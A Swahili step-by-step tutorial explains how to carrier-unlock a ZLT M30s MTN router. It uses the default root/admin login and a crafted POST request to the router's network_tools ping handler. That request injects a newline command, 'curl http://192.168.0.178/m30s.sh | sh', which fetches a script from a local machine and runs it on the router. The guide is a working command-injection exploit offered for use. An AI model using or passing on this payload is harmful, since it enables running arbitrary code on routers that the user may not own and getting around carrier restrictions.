Jinsi ya kuunlock ZLT M30s MTN itumie mitandao yote

Hii ni router ambayo inatumia SIM Card ya mtandao mmoja wa MTN kwa kutumia njia hii utaweza kuunlock router yako ya ZLT M30s MTN na utaweza kutumia SIM Card ya mtandao wowote ule unaoutaka

Unatakiwa uwe na file hizi

 Nimekuwekea maelezo pamoja na video za kuunlock 

Namna ya kuunlock ZLT M30s MTN itumie mitandao yote

Download and Install "WebSpy" extension kwenye chrome. Unganisha computer yako na internet

Bonyeza vidoti 3
Bonyeza extension >>> Visit Chrome Web Store
Andika webspy kisha bonyeza enter
Bonyeza kwenye WebSpy
Bonyeza kwenye Add to Chrome
Bonyeza Add extension
Unganisha router yako ZLT M30s MTN kwa WIFI ikiwa ina SIM Card au haina

Kwenye address bar ya browser yako andika 192.168.0.1 kisha bonyeza enter

Username: root

Password: admin

Bonyeza Log in

Itafunguka kama hivi

Fungua folder la file lako kisha run the http.cmd

Minimize

Kwenye Google Chrome, bonyeza F12 (short key) au fungua Chrome menu kwa kubonyeza vidoti 3 > More tools > Developer tools

Bonyeza More tabs

Bonyeza Spy

Bonyeza the +new button

Bonyeza kwenye Request

Chagua POST

Kwenye URL weka http://192.168.0.1/reqproc/proc_get

Kwenye Request Header weka hizo code kisha Send isTest=false&cmd=network_tools&pingTimes=1&url=127.0.0.1\ncurl http://192.168.0.178/m30s.sh | sh&port=-1&subcmd=1

Subiri mpaka imalize yenyewe

Bonyeza OK

 Username: admin

Password:  admin

Bonyeza Login

Itafunguka kama hivi

Mpaka hapo utakuwa umefanikiwa kuunlock router yako ya ZLT M30s MTN na utaweza kutumia SIM Card ya mtandao wowote

Tags: Jinsi ya kuunlock ZLT M30s MTN, namna ya kuunlock M30s MTN, jinsi ya kuunlock MTN M30s ZLT, namna ya kuunlock ZLT M30s, how to unlock ZLT M30s MTN, how to unlock M30s MTN, how to unlock M30 ZLT MTN

No comments